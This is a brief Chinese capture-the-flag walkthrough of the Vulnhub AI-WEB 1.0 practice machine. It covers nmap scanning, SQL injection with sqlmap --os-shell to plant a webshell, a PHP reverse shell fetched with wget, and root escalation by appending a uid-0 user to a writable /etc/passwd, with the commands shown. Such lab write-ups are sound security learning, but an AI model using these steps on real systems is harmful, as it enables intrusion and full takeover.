kali：192.168.111.111

靶机：192.168.111.132

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.132

robosts.txt提示两个目录

m3diNf0目录下存在info.php

漏洞利用

se3reTdir777目录下的输入框存在sql注入

从phpinfo页面中得知网站根路径

利用sqlmap写webshell到/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads目录下

sqlmap -o -r a.txt --level 5 --risk 3 --os-shell

之后利用python的http服务和wget，上传php反弹shell到目标

提权

/etc/passwd具有可写权限

写入用户进行提权

#生成密文
openssl passwd -1 -salt a a

#写入用户到/etc/passwd
echo 'a:$1$a$44cUw6Nm5bX0muHWNIwub0:0:0::/root:/bin/bash' >> /etc/passwd

flag

本栏目推荐文章
• 函数计算域名调试web应用
• web目录探测：Dirsearch
• web项目启动时dubbo报错： No provider available for the service com.davidhu.shopguide.api.service.UserEventService from the url zookeeper ://localhost:2181/org.apache.du
• 如何基于 Gin 封装出属于自己 Web 框架？
• Understanding JSON Web Encryption (JWE)
• web扫描工具-nikot的使用
• vulnhub-DC-6
• .NET开源、强大的Web报表统计系统
• EAS_WEB更新解决方案后，无法登录web页面，显示connect.refused
• web前端css框架有哪些

靶机 Vulnhub AI-WEB 1.0 WEB靶机vulnhub ai-web 1.0 详情vulnhub ai-web 1.0 ai-web 靶机vulnhub dc 靶机hacksudo过程vulnhub 靶机metasploit过程vulnhub 靶机devrandom过程vulnhub 靶机healthcare过程vulnhub 靶机photographer过程vulnhub 靶机driftingblues vulnhub